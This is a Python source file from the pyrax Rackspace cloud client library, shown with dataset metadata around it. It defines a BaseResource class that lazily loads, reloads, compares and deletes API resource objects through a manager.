| 2012-12-19T22:49:52
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,352
|
py
|
# Copyright 2010 Jacob Kaplan-Moss
# Copyright 2011 OpenStack LLC.
# Copyright 2012 Rackspace
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Base utilities to build API operation managers and objects on top of.
"""
import pyrax.utils as utils
class BaseResource(object):
"""
A resource represents a particular instance of an object (server, flavor,
etc). This is pretty much just a bag for attributes.
"""
HUMAN_ID = False
NAME_ATTR = "name"
def __init__(self, manager, info, loaded=False):
self._loaded = loaded
self.manager = manager
self._info = info
self._add_details(info)
@property
def human_id(self):
"""Subclasses may override this to provide a pretty ID which can be used
for bash completion.
"""
if self.NAME_ATTR in self.__dict__ and self.HUMAN_ID:
return utils.slugify(getattr(self, self.NAME_ATTR))
return None
def _add_details(self, info):
"""
Takes the dict returned by the API call and sets the
corresponding attributes on the object.
"""
for (key, val) in info.iteritems():
setattr(self, key, val)
def __getattr__(self, key):
"""
Many objects are lazy-loaded: only their most basic details
are initially returned. The first time any of the other attributes
are referenced, a GET is made to get the full details for the
object.
"""
if not self.loaded:
self.get()
# Attribute should be set; if not, it's not valid
try:
return self.__dict__[key]
except KeyError:
raise AttributeError("'%s' object has no attribute '%s'." % (self.__class__, key))
def __repr__(self):
reprkeys = sorted(key for key in self.__dict__.keys()
if (key[0] != "_") and (key != "manager"))
info = ", ".join("%s=%s" % (key, getattr(self, key)) for key in reprkeys)
return "<%s %s>" % (self.__class__.__name__, info)
def get(self):
"""Gets the details for the object."""
# set 'loaded' first ... so if we have to bail, we know we tried.
self.loaded = True
if not hasattr(self.manager, "get"):
return
new = self.manager.get(self)
if new:
self._add_details(new._info)
def delete(self):
"""Deletes the object."""
# set 'loaded' first ... so if we have to bail, we know we tried.
self.loaded = True
if not hasattr(self.manager, "delete"):
return
self.manager.delete(self)
def __eq__(self, other):
"""
Two resource objects that represent the same entity in the cloud
should be considered equal if they have the same ID. If they
don't have IDs, but their attribute info matches, they are equal.
"""
if not isinstance(other, self.__class__):
return False
if hasattr(self, "id") and hasattr(other, "id"):
return self.id == other.id
return self._info == other._info
def reload(self):
"""
Since resource objects are essentially snapshots of the entity they
represent at the time they are created, they do not update as the
entity updates. For example, the 'status' attribute can change, but
the instance's value for 'status' will not. This method will refresh
the instance with the current state of the underlying entity.
"""
new_obj = self.manager.get(self.id)
self._add_details(new_obj._info)
def _get_loaded(self):
return self._loaded
def _set_loaded(self, val):
self._loaded = val
loaded = property(_get_loaded, _set_loaded)
|
[
"ed@leafe.com"
] |
ed@leafe.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.